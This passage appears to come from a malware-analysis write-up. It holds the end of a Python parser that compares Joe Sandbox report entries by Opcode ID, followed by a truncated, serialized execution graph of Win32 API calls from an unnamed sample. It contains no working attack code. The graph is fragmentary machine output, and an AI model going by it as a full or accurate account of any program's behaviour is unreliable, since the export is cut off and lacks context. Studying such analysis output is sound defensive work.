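"""

SAMPLE_B = r"""
APIs
• lstrlenW.KERNEL32(0043A100,C:\Users\user\Downloads), ref: 00405F02
• CharPrevW.USER32(0043A100,00000000), ref: 00405F12
Similarity
• API ID: CharPrevlstrlen
• String ID: C:\Users\user\Downloads
• Opcode ID: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
APIs
• RegOpenKeyExW.ADVAPI32(80000001,00000000), ref: 00406010
Similarity
• API ID: Open
• String ID:
• Opcode ID: 0000000000000000000000000000000000000000000000000000000000000000
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(r"^(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
STRING_RE = re.compile(r"^(?P<value>.*), xrefs: (?P<ref>[0-9A-Fa-f]+)$")
FIELD_RE = re.compile(r"^(?P<key>[^:]+):\s*(?P<value>.*)$")


def parse_entries(text):
    """One dict per function entry; a new entry starts at each "APIs" header.

    Bullet lines ("• ...") belong to the most recent section header. Sections
    other than APIs, Strings and Similarity are skipped.
    """
    entries, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTION_HEADERS:
            if line == "APIs":
                current = {"apis": [], "strings": [], "similarity": {}}
                entries.append(current)
            section = line
            continue
        if not line.startswith("•") or current is None:
            continue
        item = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(item)
            if m:
                current["apis"].append(m.groupdict())
        elif section == "Strings":
            m = STRING_RE.match(item)
            if m:
                current["strings"].append(m.groupdict())
        elif section == "Similarity":
            m = FIELD_RE.match(item)
            if m:
                current["similarity"][m["key"]] = m["value"]
    return entries


def index_by(entries, field):
    """Map a Similarity field value (e.g. an Opcode ID) to the entries carrying it."""
    idx = {}
    for e in entries:
        value = e["similarity"].get(field)
        if value:                      # empty String IDs are not a usable key
            idx.setdefault(value, []).append(e)
    return idx


def shared_functions(text_a, text_b, field="Opcode ID"):
    """Similarity values present in both reports, each with the API names involved."""
    idx_a = index_by(parse_entries(text_a), field)
    idx_b = index_by(parse_entries(text_b), field)
    shared = []
    for value in sorted(set(idx_a) & set(idx_b)):
        apis = sorted({api["name"] for e in idx_a[value] + idx_b[value] for api in e["apis"]})
        shared.append((value, apis))
    return shared


if __name__ == "__main__":
    for opcode_id, apis in shared_functions(SAMPLE_A, SAMPLE_B):
        print(opcode_id, ", ".join(apis))
```

With the constructed inputs the CharPrevW/lstrlenW function is reported as shared on Opcode ID even though its String ID differs between the two reports, while a comparison on String ID finds nothing in common.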

Execution Graph

Execution Coverage: 3.5%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 3.6%
Total number of Nodes: 2000
Total number of Limit Nodes: 112

The rendered graph did not survive extraction; what remains is its serialized form, a flat "execution_graph" list in which each node is written as "<node id> <hex address> [labels]" (labels are the Win32 APIs or CRT symbols such as _wcslen, __fread_nolock, __wsopen_s, ___std_exception_copy and __onexit attributed to that block, or a collapsed sub-graph summarised as "N API calls") and each edge as "<id>-><id>". The export in this section is truncated at node 103038. The blocks in the exported portion that carry Win32 API calls are, by address:
• 0x995fdf: GetVersionExW
• 0x99611c: GetCurrentProcess, IsWow64Process; 0x996150: LoadLibraryA; 0x996161: GetProcAddress; 0x996171: GetNativeSystemInfo; 0x99619d and 0x9d5269: GetSystemInfo; 0x99617b: FreeLibrary (LoadLibraryA and GetProcAddress resolve GetNativeSystemInfo, with GetSystemInfo on the alternative branches)
• 0x9955a1: GetModuleFileNameW; 0x995245 and 0x99585e: GetFullPathNameW
• 0x9953b0: RegOpenKeyExW; 0x9d4be6 and 0x99424e: RegQueryValueExW; 0x9d4c7c: RegCloseKey
• 0x9b3614: RaiseException (on the error path out of ___std_exception_copy at 0x9b014b)
Collapsed nodes in the export: 0x9b0413 (29 API calls, __onexit), 0x9b521d (7 API calls, 2 library calls), 0x9ae6e8 (280 API calls), 0xa03fe1 (81 API calls, __wsopen_s).
99c3ab 8 API calls 103035->103038 103037 99c3cd 103036->103037 103039 99c3ab 8 API calls 103036->103039 103037->103041 103079 99c7e0 103037->103079 103038->103036 103039->103037 103041->103020 103060 9a0376 messages 103042->103060 103043 9b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 103043->103060 103044 9e632b 103150 a03fe1 81 API calls __wsopen_s 103044->103150 103046 9a1695 103054 99bed9 8 API calls 103046->103054 103059 9a049d messages 103046->103059 103047 9b014b 8 API calls 103047->103060 103049 9e625a 103149 a03fe1 81 API calls __wsopen_s 103049->103149 103050 99bed9 8 API calls 103050->103060 103051 9e5cdb 103057 99bed9 8 API calls 103051->103057 103051->103059 103054->103059 103055 9b05b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 103055->103060 103057->103059 103058 99bf73 8 API calls 103058->103060 103059->103005 103060->103043 103060->103044 103060->103046 103060->103047 103060->103049 103060->103050 103060->103051 103060->103055 103060->103058 103060->103059 103061 9b0413 29 API calls pre_c_initialization 103060->103061 103062 9e6115 103060->103062 103064 9a0aae messages 103060->103064 103084 9a1990 103060->103084 103146 9a1e50 40 API calls messages 103060->103146 103061->103060 103147 a03fe1 81 API calls __wsopen_s 103062->103147 103148 a03fe1 81 API calls __wsopen_s 103064->103148 103065->103025 103066->102998 103067->102993 103068->102993 103069->102993 103071 99b4dc 103070->103071 103072 99b4d6 103070->103072 103071->103020 103072->103071 103073 99bed9 8 API calls 103072->103073 103073->103071 103074->103022 103076 99befc __fread_nolock 103075->103076 103077 99beed 103075->103077 103076->103031 103077->103076 103078 9b017b 8 API calls 103077->103078 103078->103076 103081 99c7eb messages 103079->103081 103080 99c826 messages 103080->103041 103081->103080 103083 9ae322 8 API calls messages 103081->103083 103083->103080 103085 9a1a2e 
103084->103085 103086 9a19b6 103084->103086 103087 9e6a4d 103085->103087 103103 9a1a3d 103085->103103 103088 9e6b60 103086->103088 103089 9a19c3 103086->103089 103091 9e6a58 103087->103091 103092 9e6b54 103087->103092 103167 a185db 280 API calls 2 library calls 103088->103167 103097 9e6b84 103089->103097 103098 9a19cd 103089->103098 103165 9ab35c 280 API calls 103091->103165 103166 a03fe1 81 API calls __wsopen_s 103092->103166 103093 9a0340 280 API calls 103093->103103 103096 9e6bb5 103099 9e6be2 103096->103099 103100 9e6bc0 103096->103100 103097->103096 103101 9e6b9c 103097->103101 103107 99bed9 8 API calls 103098->103107 103128 9a19e0 messages 103098->103128 103170 a160e6 103099->103170 103169 a185db 280 API calls 2 library calls 103100->103169 103168 a03fe1 81 API calls __wsopen_s 103101->103168 103102 9e6979 103164 a03fe1 81 API calls __wsopen_s 103102->103164 103103->103093 103103->103102 103106 9a1bb5 103103->103106 103112 9e6908 103103->103112 103121 9a1ba9 103103->103121 103103->103128 103131 9a1af4 103103->103131 103106->103060 103107->103128 103110 9e6dd9 103116 9e6e0f 103110->103116 103268 a181ce 65 API calls 103110->103268 103163 a03fe1 81 API calls __wsopen_s 103112->103163 103114 9e6c81 103242 a01ad8 8 API calls 103114->103242 103119 99b4c8 8 API calls 103116->103119 103117 9e6db7 103245 998ec0 103117->103245 103144 9a1a23 messages 103119->103144 103120 99bed9 8 API calls 103120->103128 103121->103106 103162 a03fe1 81 API calls __wsopen_s 103121->103162 103123 9e6ded 103126 998ec0 52 API calls 103123->103126 103125 9e6c08 103177 a0148b 103125->103177 103141 9e6df5 _wcslen 103126->103141 103128->103110 103128->103144 103244 a1808f 53 API calls __wsopen_s 103128->103244 103129 9e6c93 103243 99bd07 8 API calls 103129->103243 103130 9e691d messages 103130->103102 103143 9a1b62 messages 103130->103143 103130->103144 103131->103121 103151 9a1ca0 103131->103151 103135 9a1b55 103135->103121 103135->103143 103136 9e6dbf _wcslen 103136->103110 103139 99b4c8 8 
API calls 103136->103139 103138 9e6c9c 103145 a0148b 8 API calls 103138->103145 103139->103110 103141->103116 103142 99b4c8 8 API calls 103141->103142 103142->103116 103143->103120 103143->103128 103143->103144 103144->103060 103145->103128 103146->103060 103147->103064 103148->103059 103149->103059 103150->103059 103152 9a1cb2 103151->103152 103156 9a1cbb 103152->103156 103269 9ab7a2 8 API calls 103152->103269 103154 9a1d70 103154->103135 103155 9b014b 8 API calls 103157 9a1dd9 103155->103157 103156->103154 103156->103155 103158 9b014b 8 API calls 103157->103158 103159 9a1de2 103158->103159 103160 99b329 8 API calls 103159->103160 103161 9a1df1 103160->103161 103161->103135 103162->103144 103163->103130 103164->103128 103165->103143 103166->103088 103167->103128 103168->103144 103169->103128 103171 a16101 103170->103171 103172 9e6bed 103170->103172 103173 9b017b 8 API calls 103171->103173 103172->103114 103172->103125 103175 a16123 103173->103175 103174 9b014b 8 API calls 103174->103175 103175->103172 103175->103174 103270 a01400 8 API calls 103175->103270 103178 9e6c32 103177->103178 103179 a01499 103177->103179 103181 9a2b20 103178->103181 103179->103178 103180 9b014b 8 API calls 103179->103180 103180->103178 103182 9a2b61 103181->103182 103183 9a2fc0 103182->103183 103184 9a2b86 103182->103184 103422 9b05b2 5 API calls __Init_thread_wait 103183->103422 103185 9e7bd8 103184->103185 103186 9a2ba0 103184->103186 103385 a17af9 103185->103385 103271 9a3160 103186->103271 103190 9a2fca 103193 99b329 8 API calls 103190->103193 103199 9a300b 103190->103199 103192 9e7be4 103192->103128 103202 9a2fe4 103193->103202 103194 9a3160 9 API calls 103195 9a2bc6 103194->103195 103196 9a2bfc 103195->103196 103195->103199 103198 9e7bfd 103196->103198 103223 9a2c18 __fread_nolock 103196->103223 103197 9e7bed 103197->103128 103426 a03fe1 81 API calls __wsopen_s 103198->103426 103199->103197 103201 99b4c8 8 API calls 103199->103201 103203 9a3049 103201->103203 103423 9b0568 
EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103202->103423 103424 9ae6e8 280 API calls 103203->103424 103206 9e7c15 103427 a03fe1 81 API calls __wsopen_s 103206->103427 103208 9a2d3f 103209 9e7c78 103208->103209 103210 9a2d4c 103208->103210 103429 a161a2 53 API calls _wcslen 103209->103429 103211 9a3160 9 API calls 103210->103211 103213 9a2d59 103211->103213 103217 9a3160 9 API calls 103213->103217 103230 9a2dd7 messages 103213->103230 103214 9b014b 8 API calls 103214->103223 103215 9b017b 8 API calls 103215->103223 103216 9a3082 103425 9afe39 8 API calls 103216->103425 103228 9a2d73 103217->103228 103219 9a2f2d 103219->103128 103221 9a30bd 103221->103128 103222 9a0340 280 API calls 103222->103223 103223->103203 103223->103206 103223->103208 103223->103214 103223->103215 103223->103222 103225 9e7c59 103223->103225 103223->103230 103224 9a2e8b messages 103224->103219 103421 9ae322 8 API calls messages 103224->103421 103428 a03fe1 81 API calls __wsopen_s 103225->103428 103226 9a3160 9 API calls 103226->103230 103228->103230 103231 99bed9 8 API calls 103228->103231 103230->103216 103230->103224 103230->103226 103281 a233a3 103230->103281 103286 a0d653 103230->103286 103306 a10fb8 103230->103306 103331 a0669f 103230->103331 103336 a19fe8 103230->103336 103339 a0664c 103230->103339 103346 9aac3e 103230->103346 103365 a1ad47 103230->103365 103370 a1a5b2 103230->103370 103376 a0f94a 103230->103376 103430 a03fe1 81 API calls __wsopen_s 103230->103430 103231->103230 103242->103129 103243->103138 103244->103117 103246 998ed2 103245->103246 103247 998ed5 103245->103247 103246->103136 103248 998f0b 103247->103248 103249 998edd 103247->103249 103250 9d6b1f 103248->103250 103253 998f1d 103248->103253 103261 9d6a38 103248->103261 103888 9b5536 26 API calls 103249->103888 103891 9b54f3 26 API calls 103250->103891 103889 9afe6f 51 API calls 103253->103889 103254 998eed 103258 9b014b 8 API calls 103254->103258 103255 9d6b37 103255->103255 103259 998ef7 
103258->103259 103262 99b329 8 API calls 103259->103262 103260 9d6ab1 103890 9afe6f 51 API calls 103260->103890 103261->103260 103263 9b017b 8 API calls 103261->103263 103262->103246 103264 9d6a81 103263->103264 103265 9b014b 8 API calls 103264->103265 103266 9d6aa8 103265->103266 103267 99b329 8 API calls 103266->103267 103267->103260 103268->103123 103269->103156 103270->103175 103272 9a31a1 103271->103272 103277 9a317d 103271->103277 103431 9b05b2 5 API calls __Init_thread_wait 103272->103431 103274 9a31ab 103274->103277 103432 9b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103274->103432 103276 9a9f47 103280 9a2bb0 103276->103280 103434 9b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103276->103434 103277->103280 103433 9b05b2 5 API calls __Init_thread_wait 103277->103433 103280->103194 103435 a235cc 103281->103435 103283 a233b1 103284 99b4c8 8 API calls 103283->103284 103285 a233f9 103284->103285 103285->103230 103287 a0d678 103286->103287 103288 a0d66d 103286->103288 103290 998ec0 52 API calls 103287->103290 103457 99c98d 39 API calls 103288->103457 103291 a0d68a 103290->103291 103452 a0c783 103291->103452 103307 a10fe1 103306->103307 103308 a1100f WSAStartup 103307->103308 103471 99c98d 39 API calls 103307->103471 103310 a11054 103308->103310 103321 a11023 messages 103308->103321 103458 9ac1f6 103310->103458 103312 a10ffc 103312->103308 103472 99c98d 39 API calls 103312->103472 103314 998ec0 52 API calls 103316 a11069 103314->103316 103463 9af9d4 WideCharToMultiByte 103316->103463 103317 a1100b 103317->103308 103319 a11075 inet_addr gethostbyname 103320 a11093 IcmpCreateFile 103319->103320 103319->103321 103320->103321 103322 a110d3 103320->103322 103321->103230 103323 9b017b 8 API calls 103322->103323 103324 a110ec 103323->103324 103325 99423c 8 API calls 103324->103325 103326 a110f7 103325->103326 103327 a11102 IcmpSendEcho 103326->103327 103328 a1112b IcmpSendEcho 103326->103328 103329 a1114c 103327->103329 
103328->103329 103330 a11212 IcmpCloseHandle WSACleanup 103329->103330 103330->103321 103332 998ec0 52 API calls 103331->103332 103333 a066b2 103332->103333 103475 9fe472 lstrlenW 103333->103475 103335 a066bc 103335->103230 103480 a189b6 103336->103480 103338 a19ff8 103338->103230 103340 998ec0 52 API calls 103339->103340 103341 a06662 103340->103341 103615 9fdc54 103341->103615 103343 a0666a 103344 a0666e GetLastError 103343->103344 103345 a06683 103343->103345 103344->103345 103345->103230 103347 998ec0 52 API calls 103346->103347 103348 9aac68 103347->103348 103708 9abc58 103348->103708 103350 9aac7f 103360 9ab09b _wcslen 103350->103360 103727 99c98d 39 API calls 103350->103727 103354 9abbbe 43 API calls 103354->103360 103357 996c03 8 API calls 103357->103360 103358 9ab1fb 103358->103230 103359 998ec0 52 API calls 103359->103360 103360->103354 103360->103357 103360->103358 103360->103359 103361 998577 8 API calls 103360->103361 103364 99c98d 39 API calls 103360->103364 103713 99396b 103360->103713 103723 993907 103360->103723 103728 9b4d98 103360->103728 103738 997ad5 103360->103738 103743 99ad40 8 API calls __fread_nolock 103360->103743 103744 997b1a 8 API calls 103360->103744 103361->103360 103364->103360 103366 998ec0 52 API calls 103365->103366 103367 a1ad63 103366->103367 103785 9fdd87 CreateToolhelp32Snapshot Process32FirstW 103367->103785 103369 a1ad72 103369->103230 103371 a1a5c5 103370->103371 103372 998ec0 52 API calls 103371->103372 103375 a1a5d4 103371->103375 103373 a1a632 103372->103373 103841 a018a9 103373->103841 103375->103230 103377 9b017b 8 API calls 103376->103377 103378 a0f95b 103377->103378 103379 99423c 8 API calls 103378->103379 103380 a0f965 103379->103380 103381 998ec0 52 API calls 103380->103381 103382 a0f97c GetEnvironmentVariableW 103381->103382 103882 a0160f 8 API calls 103382->103882 103384 a0f999 messages 103384->103230 103386 a17b52 103385->103386 103387 a17b38 103385->103387 103389 a160e6 8 API calls 103386->103389 103883 a03fe1 
81 API calls __wsopen_s 103387->103883 103391 a17b5d 103389->103391 103390 a17b4a 103390->103192 103392 9a0340 279 API calls 103391->103392 103393 a17bc1 103392->103393 103393->103390 103394 a17c5c 103393->103394 103398 a17c03 103393->103398 103395 a17cb0 103394->103395 103396 a17c62 103394->103396 103395->103390 103397 998ec0 52 API calls 103395->103397 103884 a01ad8 8 API calls 103396->103884 103399 a17cc2 103397->103399 103403 a0148b 8 API calls 103398->103403 103401 99c2c9 8 API calls 103399->103401 103405 a17ce6 CharUpperBuffW 103401->103405 103402 a17c85 103885 99bd07 8 API calls 103402->103885 103404 a17c3b 103403->103404 103407 9a2b20 279 API calls 103404->103407 103408 a17d00 103405->103408 103407->103390 103409 a17d53 103408->103409 103410 a17d07 103408->103410 103411 998ec0 52 API calls 103409->103411 103414 a0148b 8 API calls 103410->103414 103412 a17d5b 103411->103412 103886 9aaa65 9 API calls 103412->103886 103415 a17d35 103414->103415 103416 9a2b20 279 API calls 103415->103416 103416->103390 103417 a17d65 103417->103390 103418 998ec0 52 API calls 103417->103418 103419 a17d80 103418->103419 103887 99bd07 8 API calls 103419->103887 103421->103224 103422->103190 103423->103199 103424->103216 103425->103221 103426->103230 103427->103230 103428->103230 103429->103228 103430->103230 103431->103274 103432->103277 103433->103276 103434->103280 103441 a23574 103435->103441 103438 a235ed timeGetTime 103438->103283 103442 99b4c8 8 API calls 103441->103442 103443 a2358f 103442->103443 103444 a2359b 103443->103444 103445 a235b9 103443->103445 103446 998ec0 52 API calls 103444->103446 103447 998577 8 API calls 103445->103447 103448 a235a8 103446->103448 103449 a235b7 103447->103449 103448->103449 103450 99bed9 8 API calls 103448->103450 103449->103438 103451 99c98d 39 API calls 103449->103451 103450->103449 103451->103438 103453 99b329 8 API calls 103452->103453 103454 a0c7ae 103453->103454 103455 99b329 8 API calls 103454->103455 103456 a0c7b9 103455->103456 
103457->103287 103459 9b017b 8 API calls 103458->103459 103460 9ac209 103459->103460 103461 9b014b 8 API calls 103460->103461 103462 9ac215 103461->103462 103462->103314 103464 9af9fe 103463->103464 103465 9afa35 103463->103465 103467 9b017b 8 API calls 103464->103467 103474 9afe8a 8 API calls 103465->103474 103468 9afa05 WideCharToMultiByte 103467->103468 103473 9afa3e 8 API calls __fread_nolock 103468->103473 103470 9afa29 103470->103319 103471->103312 103472->103317 103473->103470 103474->103470 103476 9fe4ba 103475->103476 103477 9fe490 GetFileAttributesW 103475->103477 103476->103335 103477->103476 103478 9fe49c FindFirstFileW 103477->103478 103478->103476 103479 9fe4ad FindClose 103478->103479 103479->103476 103481 998ec0 52 API calls 103480->103481 103482 a189ed 103481->103482 103505 a18a32 messages 103482->103505 103518 a19730 103482->103518 103484 a18cde 103485 a18eac 103484->103485 103490 a18cec 103484->103490 103575 a19941 59 API calls 103485->103575 103488 a18ebb 103489 a18ec7 103488->103489 103488->103490 103489->103505 103531 a188e3 103490->103531 103491 998ec0 52 API calls 103508 a18aa6 103491->103508 103496 a18d25 103545 9affe0 103496->103545 103499 a18d45 103574 a03fe1 81 API calls __wsopen_s 103499->103574 103500 a18d5f 103550 997e12 103500->103550 103503 a18d50 GetCurrentProcess TerminateProcess 103503->103500 103505->103338 103508->103484 103508->103491 103508->103505 103572 9f4ad3 8 API calls __fread_nolock 103508->103572 103573 a18f7a 41 API calls _strftime 103508->103573 103509 9a1ca0 8 API calls 103511 a18d9e 103509->103511 103510 a18f22 103510->103505 103513 a18f36 FreeLibrary 103510->103513 103514 a195d8 74 API calls 103511->103514 103512 9a1ca0 8 API calls 103517 a18daf 103512->103517 103513->103505 103514->103517 103516 99b4c8 8 API calls 103516->103517 103517->103510 103517->103512 103517->103516 103561 a195d8 103517->103561 103519 99c2c9 8 API calls 103518->103519 103520 a1974b CharLowerBuffW 103519->103520 103576 9f9805 103520->103576 
103524 99bf73 8 API calls 103525 a19787 103524->103525 103583 99acc0 103525->103583 103527 a1979b 103528 99adf4 8 API calls 103527->103528 103530 a197a5 _wcslen 103528->103530 103529 a198bb _wcslen 103529->103508 103530->103529 103595 a18f7a 41 API calls _strftime 103530->103595 103532 a188fe 103531->103532 103536 a18949 103531->103536 103533 9b017b 8 API calls 103532->103533 103534 a18920 103533->103534 103535 9b014b 8 API calls 103534->103535 103534->103536 103535->103534 103537 a19af3 103536->103537 103538 a19d08 messages 103537->103538 103543 a19b17 _strcat _wcslen ___std_exception_copy 103537->103543 103538->103496 103539 99ca5b 39 API calls 103539->103543 103540 99c63f 39 API calls 103540->103543 103541 99c98d 39 API calls 103541->103543 103542 998ec0 52 API calls 103542->103543 103543->103538 103543->103539 103543->103540 103543->103541 103543->103542 103599 9ff8c5 10 API calls _wcslen 103543->103599 103546 9afff5 103545->103546 103547 9b008d Sleep 103546->103547 103548 9b007b FindCloseChangeNotification 103546->103548 103549 9b005b 103546->103549 103547->103549 103548->103549 103549->103499 103549->103500 103551 997e1a 103550->103551 103552 9b014b 8 API calls 103551->103552 103553 997e28 103552->103553 103600 998445 103553->103600 103556 998470 103603 99c760 103556->103603 103558 9b017b 8 API calls 103560 99851c 103558->103560 103559 998480 103559->103558 103559->103560 103560->103509 103560->103517 103562 a195f0 103561->103562 103566 a1960c 103561->103566 103563 a196c1 103562->103563 103564 a195f7 103562->103564 103565 a19618 103562->103565 103562->103566 103614 a0169e 72 API calls messages 103563->103614 103611 9ff4e8 10 API calls _strlen 103564->103611 103613 996c03 8 API calls 103565->103613 103566->103517 103570 a19601 103612 996c03 8 API calls 103570->103612 103572->103508 103573->103508 103574->103503 103575->103488 103577 9f9825 _wcslen 103576->103577 103579 9f985a 103577->103579 103580 9f9919 103577->103580 103582 9f9914 103577->103582 
103579->103582 103596 9ae36b 41 API calls 103579->103596 103580->103582 103597 9ae36b 41 API calls 103580->103597 103582->103524 103582->103530 103584 99accf 103583->103584 103586 99ace1 103583->103586 103585 99c2c9 8 API calls 103584->103585 103593 99acda __fread_nolock 103584->103593 103587 9e05a3 __fread_nolock 103585->103587 103586->103584 103588 9e0557 103586->103588 103589 99ad07 103586->103589 103590 9b014b 8 API calls 103588->103590 103598 9988e8 8 API calls 103589->103598 103592 9e0561 103590->103592 103594 9b017b 8 API calls 103592->103594 103593->103527 103594->103584 103595->103529 103596->103579 103597->103580 103598->103593 103599->103543 103601 9b014b 8 API calls 103600->103601 103602 997e30 103601->103602 103602->103556 103604 99c76b 103603->103604 103605 9e1285 103604->103605 103610 99c773 messages 103604->103610 103606 9b014b 8 API calls 103605->103606 103608 9e1291 103606->103608 103607 99c77a 103607->103559 103609 99c7e0 8 API calls 103609->103610 103610->103607 103610->103609 103611->103570 103612->103566 103613->103566 103614->103566 103616 99bf73 8 API calls 103615->103616 103617 9fdc73 103616->103617 103618 99bf73 8 API calls 103617->103618 103619 9fdc7c 103618->103619 103620 99bf73 8 API calls 103619->103620 103621 9fdc85 103620->103621 103622 995851 9 API calls 103621->103622 103623 9fdc90 103622->103623 103640 9feab0 GetFileAttributesW 103623->103640 103626 9fdcab 103642 99568e 103626->103642 103627 996b7c 8 API calls 103627->103626 103629 9fdcbf FindFirstFileW 103630 9fdcde 103629->103630 103631 9fdd4b FindClose 103629->103631 103630->103631 103635 9fdce2 103630->103635 103636 9fdd56 103631->103636 103632 9fdd26 FindNextFileW 103632->103630 103632->103635 103633 99bed9 8 API calls 103633->103635 103635->103630 103635->103632 103635->103633 103637 996b7c 8 API calls 103635->103637 103684 997bb5 103635->103684 103636->103343 103638 9fdd17 DeleteFileW 103637->103638 103638->103632 103639 9fdd42 FindClose 103638->103639 103639->103636 103641 
9fdc99 103640->103641 103641->103626 103641->103627 103643 99bf73 8 API calls 103642->103643 103644 9956a4 103643->103644 103645 99bf73 8 API calls 103644->103645 103646 9956ac 103645->103646 103647 99bf73 8 API calls 103646->103647 103648 9956b4 103647->103648 103649 99bf73 8 API calls 103648->103649 103650 9956bc 103649->103650 103651 9956f0 103650->103651 103652 9d4da1 103650->103652 103654 99acc0 8 API calls 103651->103654 103653 99bed9 8 API calls 103652->103653 103655 9d4daa 103653->103655 103656 9956fe 103654->103656 103657 99bd57 8 API calls 103655->103657 103658 99adf4 8 API calls 103656->103658 103661 995733 103657->103661 103659 995708 103658->103659 103660 99acc0 8 API calls 103659->103660 103659->103661 103664 995729 103660->103664 103662 995754 103661->103662 103676 995778 103661->103676 103683 9d4dcc 103661->103683 103662->103676 103693 99655e 103662->103693 103663 99acc0 8 API calls 103665 995789 103663->103665 103666 99adf4 8 API calls 103664->103666 103669 99579f 103665->103669 103672 99bed9 8 API calls 103665->103672 103666->103661 103668 9957b3 103673 9957be 103668->103673 103677 99bed9 8 API calls 103668->103677 103669->103668 103674 99bed9 8 API calls 103669->103674 103670 995761 103675 99acc0 8 API calls 103670->103675 103670->103676 103671 998577 8 API calls 103680 9d4e8c 103671->103680 103672->103669 103678 99bed9 8 API calls 103673->103678 103681 9957c9 103673->103681 103674->103668 103675->103676 103676->103663 103677->103673 103678->103681 103679 99655e 8 API calls 103679->103680 103680->103676 103680->103679 103696 99ad40 8 API calls __fread_nolock 103680->103696 103681->103629 103683->103671 103685 9d641d 103684->103685 103686 997bc7 103684->103686 103707 9f13c8 8 API calls __fread_nolock 103685->103707 103697 997bd8 103686->103697 103689 997bd3 103689->103635 103690 9d6427 103691 9d6433 103690->103691 103692 99bed9 8 API calls 103690->103692 103692->103691 103694 99c2c9 8 API calls 103693->103694 103695 996569 103694->103695 
103695->103670 103696->103680 103698 997be7 103697->103698 103703 997c1b __fread_nolock 103697->103703 103699 9d644e 103698->103699 103700 997c0e 103698->103700 103698->103703 103702 9b014b 8 API calls 103699->103702 103701 997d74 8 API calls 103700->103701 103701->103703 103704 9d645d 103702->103704 103703->103689 103705 9b017b 8 API calls 103704->103705 103706 9d6491 __fread_nolock 103705->103706 103707->103690 103709 9b014b 8 API calls 103708->103709 103710 9abc65 103709->103710 103711 99b329 8 API calls 103710->103711 103712 9abc70 103711->103712 103712->103350 103714 993996 ___scrt_fastfail 103713->103714 103745 995f32 103714->103745 103718 9d40cd Shell_NotifyIconW 103719 993a3a Shell_NotifyIconW 103749 9961a9 103719->103749 103720 993a1c 103720->103718 103720->103719 103722 993a50 103722->103360 103724 993969 103723->103724 103725 993919 ___scrt_fastfail 103723->103725 103724->103360 103726 993938 Shell_NotifyIconW 103725->103726 103726->103724 103727->103360 103729 9b4e1b 103728->103729 103730 9b4da6 103728->103730 103784 9b4e2d 40 API calls 3 library calls 103729->103784 103737 9b4dcb 103730->103737 103782 9bf649 20 API calls _free 103730->103782 103733 9b4e28 103733->103360 103734 9b4db2 103783 9c2b5c 26 API calls __cftof 103734->103783 103736 9b4dbd 103736->103360 103737->103360 103739 9b017b 8 API calls 103738->103739 103740 997afa 103739->103740 103741 9b014b 8 API calls 103740->103741 103742 997b08 103741->103742 103742->103360 103743->103360 103744->103360 103746 995f4e 103745->103746 103747 9939eb 103745->103747 103746->103747 103748 9d5070 DestroyIcon 103746->103748 103747->103720 103779 9fd11f 42 API calls _strftime 103747->103779 103748->103747 103750 9961c6 103749->103750 103769 9962a8 103749->103769 103751 997ad5 8 API calls 103750->103751 103752 9961d4 103751->103752 103753 9d5278 LoadStringW 103752->103753 103754 9961e1 103752->103754 103757 9d5292 103753->103757 103755 998577 8 API calls 103754->103755 103756 9961f6 103755->103756 103758 
996203 103756->103758 103765 9d52ae 103756->103765 103760 99bed9 8 API calls 103757->103760 103763 996229 ___scrt_fastfail 103757->103763 103758->103757 103759 99620d 103758->103759 103761 996b7c 8 API calls 103759->103761 103760->103763 103762 99621b 103761->103762 103764 997bb5 8 API calls 103762->103764 103767 99628e Shell_NotifyIconW 103763->103767 103764->103763 103765->103763 103766 9d52f1 103765->103766 103768 99bf73 8 API calls 103765->103768 103781 9afe6f 51 API calls 103766->103781 103767->103769 103770 9d52d8 103768->103770 103769->103722 103780 9fa350 9 API calls 103770->103780 103773 9d52e3 103775 997bb5 8 API calls 103773->103775 103774 9d5310 103776 996b7c 8 API calls 103774->103776 103775->103766 103777 9d5321 103776->103777 103778 996b7c 8 API calls 103777->103778 103778->103763 103779->103720 103780->103773 103781->103774 103782->103734 103783->103736 103784->103733 103795 9fe80e 103785->103795 103787 9fde86 FindCloseChangeNotification 103787->103369 103788 9fddd4 Process32NextW 103788->103787 103790 9fddcd 103788->103790 103789 99bf73 8 API calls 103789->103790 103790->103787 103790->103788 103790->103789 103791 99b329 8 API calls 103790->103791 103792 99568e 8 API calls 103790->103792 103793 997bb5 8 API calls 103790->103793 103801 9ae36b 41 API calls 103790->103801 103791->103790 103792->103790 103793->103790 103800 9fe819 103795->103800 103796 9fe830 103803 9b666b 103796->103803 103799 9fe836 103799->103790 103800->103796 103800->103799 103802 9b6722 GetStringTypeW _strftime 103800->103802 103801->103790 103802->103800 103804 9b6684 _strftime 103803->103804 103807 9b5f80 103804->103807 103825 9b65c9 103807->103825 103809 9b5fd7 103834 9b4d15 38 API calls 2 library calls 103809->103834 103810 9b5faa 103832 9bf649 20 API calls _free 103810->103832 103811 9b5f93 103811->103809 103811->103810 103824 9b5fba 103811->103824 103814 9b5faf 103833 9c2b5c 26 API calls __cftof 103814->103833 103817 9b5fe2 103818 9b600b 103817->103818 103835 9c3a62 
